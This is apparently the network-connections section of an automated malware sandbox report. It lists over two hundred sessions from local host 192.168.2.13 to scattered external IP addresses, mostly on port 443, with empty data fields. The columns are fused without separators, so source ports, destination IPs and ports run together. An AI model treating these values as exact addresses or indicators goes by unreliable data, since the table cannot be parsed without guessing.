                                        23034192.168.2.1346400149.43.190.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23035192.168.2.1358892166.229.159.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23036192.168.2.133349086.60.186.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23037192.168.2.1351630195.201.129.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23038192.168.2.1358556219.203.168.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23039192.168.2.1360672110.34.214.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23040192.168.2.1344026151.204.234.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23041192.168.2.133408245.164.245.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23042192.168.2.13396321.147.124.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23043192.168.2.134545645.8.204.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23044192.168.2.1354366218.157.206.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23045192.168.2.134297268.76.71.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23046192.168.2.1359452143.212.153.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23047192.168.2.1346422116.52.24.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23048192.168.2.135367442.208.235.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23049192.168.2.135462864.86.107.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23050192.168.2.134684819.113.47.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23051192.168.2.135667064.192.201.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23052192.168.2.1358590167.32.212.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23053192.168.2.1333466146.74.58.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23054192.168.2.1345700205.252.99.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23055192.168.2.135408043.184.127.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23056192.168.2.1344172103.131.229.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23057192.168.2.134612018.121.195.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23058192.168.2.1344088202.176.133.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23059192.168.2.134659457.245.166.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23060192.168.2.1355662171.170.230.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23061192.168.2.13444725.218.14.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23062192.168.2.1350016169.81.196.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23063192.168.2.1360864136.121.74.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23064192.168.2.134784464.88.151.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23065192.168.2.135965446.170.5.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23066192.168.2.133478264.185.39.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23067192.168.2.1344440158.110.213.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23068192.168.2.1352770185.55.54.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23069192.168.2.1357000216.161.97.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23070192.168.2.135402653.142.22.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23071192.168.2.1356432213.133.22.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23072192.168.2.1349320167.165.154.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23073192.168.2.133614612.239.181.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23074192.168.2.133958677.48.92.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23075192.168.2.1359242174.169.51.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23076192.168.2.135327486.81.146.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23077192.168.2.1344624149.82.1.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23078192.168.2.1351978199.194.8.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23079192.168.2.1333222164.105.21.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23080192.168.2.135886482.43.22.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23081192.168.2.1358444222.153.93.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23082192.168.2.1353170195.238.141.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23083192.168.2.135329264.240.227.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23084192.168.2.134934064.161.230.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23085192.168.2.1359310199.6.252.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23086192.168.2.13390765.177.118.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23087192.168.2.1342964196.112.135.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23088192.168.2.1359172213.193.100.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23089192.168.2.1352214222.20.144.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23090192.168.2.13412388.37.231.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23091192.168.2.1353092162.162.107.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23092192.168.2.133630091.16.27.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23093192.168.2.133991658.82.177.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23094192.168.2.1353092197.222.207.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23095192.168.2.1341196194.17.79.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23096192.168.2.1348396207.51.3.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23097192.168.2.135057467.235.0.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23098192.168.2.1339848199.65.137.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23099192.168.2.1357596124.29.139.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23100192.168.2.1356032125.113.175.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23101192.168.2.134626248.74.200.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23102192.168.2.1350834142.140.198.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23103192.168.2.133380887.207.76.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23104192.168.2.135000631.112.113.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23105192.168.2.134441098.118.72.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23106192.168.2.1342634205.131.46.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23107192.168.2.133659073.82.0.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23108192.168.2.1336818197.73.112.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23109192.168.2.1335938184.252.219.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23110192.168.2.1352264142.228.126.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23111192.168.2.133767225.131.76.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23112192.168.2.1354134218.21.129.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23113192.168.2.1350140122.52.75.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23114192.168.2.1353518106.185.67.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23115192.168.2.1357340208.16.36.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23116192.168.2.1336626157.205.115.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23117192.168.2.134086659.242.186.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23118192.168.2.1336530111.23.238.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23119192.168.2.134321814.168.123.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23120192.168.2.1335422128.164.78.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23121192.168.2.1356672200.141.162.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23122192.168.2.1355702159.48.187.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23123192.168.2.1352892199.83.34.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23124192.168.2.1335322197.158.248.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23125192.168.2.134442889.186.137.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23126192.168.2.135728685.35.226.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23127192.168.2.134589272.153.156.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23128192.168.2.133462868.147.35.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23129192.168.2.1357412117.239.212.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23130192.168.2.1338848106.77.101.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23131192.168.2.1357894202.202.147.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23132192.168.2.133823031.184.248.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23133192.168.2.1353630110.38.233.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23134192.168.2.1334364109.103.189.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23135192.168.2.134016213.70.71.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23136192.168.2.135068831.65.93.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23137192.168.2.1346592122.193.213.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23138192.168.2.134210865.205.212.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23139192.168.2.1337700182.122.158.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23140192.168.2.1355274146.72.33.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23141192.168.2.1341284129.84.227.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23142192.168.2.133610896.113.45.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23143192.168.2.135368059.166.7.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23144192.168.2.135631434.79.15.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23145192.168.2.1348168147.96.215.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23146192.168.2.1351894187.167.60.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23147192.168.2.1334746223.10.229.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23148192.168.2.13431182.184.45.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23149192.168.2.1356264193.95.24.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23150192.168.2.1357462181.211.116.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23151192.168.2.1351870103.110.116.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23152192.168.2.1336590174.13.175.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23153192.168.2.135434237.124.137.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23154192.168.2.1352200153.100.41.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23155192.168.2.1355592128.186.184.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23156192.168.2.1354280178.80.171.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23157192.168.2.1352222183.253.199.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23158192.168.2.1353276122.205.170.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23159192.168.2.134301831.76.255.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23160192.168.2.1341112189.5.152.1738080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23161192.168.2.1337860162.213.117.2318080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23162192.168.2.1333084205.39.180.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23163192.168.2.135987645.157.163.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23164192.168.2.133580446.4.43.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23165192.168.2.1353524167.85.62.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23166192.168.2.1353746182.101.134.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23167192.168.2.1355348206.115.81.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23168192.168.2.135214013.247.252.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23169192.168.2.1351586179.123.171.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23170192.168.2.1359564178.100.254.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23171192.168.2.1350064136.28.104.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23172192.168.2.13490544.21.150.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23173192.168.2.13503304.137.237.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23174192.168.2.1335958178.81.21.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23175192.168.2.1348156192.146.157.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23176192.168.2.1339398160.112.142.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23177192.168.2.134350093.156.216.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23178192.168.2.1358136196.198.104.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23179192.168.2.1339512123.202.130.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23180192.168.2.135973443.121.197.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23181192.168.2.135616246.90.234.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23182192.168.2.1337758148.140.39.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23183192.168.2.135007420.5.224.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23184192.168.2.1339286192.81.192.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23185192.168.2.1356516176.90.59.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23186192.168.2.1355518117.199.125.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23187192.168.2.135932852.83.250.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23188192.168.2.133470499.18.95.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23189192.168.2.1333748128.127.83.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23190192.168.2.1353120150.254.86.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23191192.168.2.1354720213.132.52.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23192192.168.2.133712032.100.243.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23193192.168.2.133649849.176.194.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23194192.168.2.134038862.241.151.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23195192.168.2.1359956221.82.236.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23196192.168.2.134125886.224.18.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23197192.168.2.1352174113.167.95.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23198192.168.2.1356874220.238.61.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23199192.168.2.133796464.224.167.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23200192.168.2.135581220.88.132.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23201192.168.2.1333702202.246.66.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23202192.168.2.133629218.74.143.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23203192.168.2.134189086.55.68.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23204192.168.2.133423494.227.17.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23205192.168.2.1345716109.65.196.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23206192.168.2.1346248100.167.18.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23207192.168.2.133485436.149.192.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23208192.168.2.1348010209.245.51.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23209192.168.2.135883482.50.24.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23210192.168.2.133654219.244.230.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23211192.168.2.1353154192.206.110.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23212192.168.2.1356050187.142.26.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23213192.168.2.1346716133.190.168.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23214192.168.2.135025671.108.209.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23215192.168.2.134007225.249.153.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23216192.168.2.1354854209.172.198.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23217192.168.2.135699658.11.20.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23218192.168.2.135645065.179.9.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23219192.168.2.134864614.216.151.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23220192.168.2.1348908103.39.126.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23221192.168.2.1358638116.140.97.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23222192.168.2.136080436.162.243.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23223192.168.2.134083670.213.183.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23224192.168.2.1332982128.13.146.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23225192.168.2.1351412187.146.239.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23226192.168.2.135335288.173.24.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23227192.168.2.1343808193.74.143.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23228192.168.2.135243212.191.200.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23229192.168.2.1334962119.222.254.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23230192.168.2.134509282.85.200.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23231192.168.2.134429884.224.165.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23232192.168.2.135998092.161.92.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23233192.168.2.133873031.86.179.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23234192.168.2.1348322128.187.130.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23235192.168.2.1335092199.132.87.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23236192.168.2.134404452.29.240.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23237192.168.2.133938445.61.58.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23238192.168.2.133671236.83.91.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23239192.168.2.133337893.170.147.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23240192.168.2.134833683.130.246.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23241192.168.2.134968472.37.46.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23242192.168.2.1355022156.85.131.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23243192.168.2.1360826109.102.149.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23244192.168.2.1352214143.77.35.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23245192.168.2.135173298.9.11.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23246192.168.2.1351668138.1.131.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23247192.168.2.1342742194.135.131.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23248192.168.2.133521459.108.200.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23249192.168.2.1349260143.39.36.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23250192.168.2.133907053.120.45.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23251192.168.2.134018067.56.151.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23252192.168.2.1354566213.203.12.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23253192.168.2.1352120183.173.233.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23254192.168.2.133479437.225.139.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23255192.168.2.1349934204.10.45.68443
                                        TimestampBytes transferredDirectionData


